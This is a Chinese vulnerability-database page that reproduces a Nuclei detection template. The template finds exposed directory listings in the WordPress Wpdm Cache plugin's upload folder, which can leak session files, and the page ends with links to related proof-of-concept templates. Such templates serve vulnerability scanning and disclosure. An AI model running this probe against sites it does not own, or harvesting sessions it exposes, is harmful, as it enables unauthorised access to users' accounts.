wpdm-cache-session: Wpdm-Cache Session

漏洞描述

PoC代码[已公开]

id: wpdm-cache-session

info:
  name: Wpdm-Cache Session
  author: dhiyaneshDk
  severity: medium
  description: Leaked session of Wpdm Cache wordpress plugin.
  reference:
    - https://www.exploit-db.com/ghdb/7004
  metadata:
    max-request: 1
  tags: wordpress,edb,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/uploads/wpdm-cache/'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Index of /"
          - ".txt"
          - "wpdm-cache"
        condition: and
        part: body

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d441aa915d512a7f5f8d120dee975274f9f39c61b124726d0f8296e5612f82e702206c59fd25263b3e257e37f35487993df83018c7694d5d13c7bc0fac5a6e3766ac:922c64590222798bb761d5b6d8e72950

相关漏洞推荐

• POC CVE-2024-47374: LiteSpeed Cache <= 6.5.0.2 - Stored XSS
• Adobe Commerce/Magento SessionReaper /customer/address_file/upload 文件上传漏洞（CVE-2025-54236）
• Panabit iXCache /cgi-bin/Maintain/date_config 远程命令执行漏洞
• cache-poisoning-xss: Cache Poisoning - Stored XSS
• yonyou-u8-datacache-disclosure: 用友u8-crm存在信息泄露漏洞
• sangfor-vpn-supersession-rce: Sangfor VPN SuperSession TO RCE
• POC CVE-2019-6715: W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated File Read / Directory Traversal
• POC CVE-2020-36836: WordPress WP Fastest Cache <= 0.9.0.2 - Authenticated Arbitrary File Deletion
• POC CVE-2021-24436: WordPress W3 Total Cache <2.1.4 - Cross-Site Scripting
• POC CVE-2021-24452: WordPress W3 Total Cache <2.1.5 - Cross-Site Scripting
• POC CVE-2021-37704: phpfastcache - phpinfo Resource Exposure
• POC CVE-2021-39165: Cachet <=2.3.18 - SQL Injection
• POC CVE-2023-22620: SecurePoint UTM 12.x Session ID Leak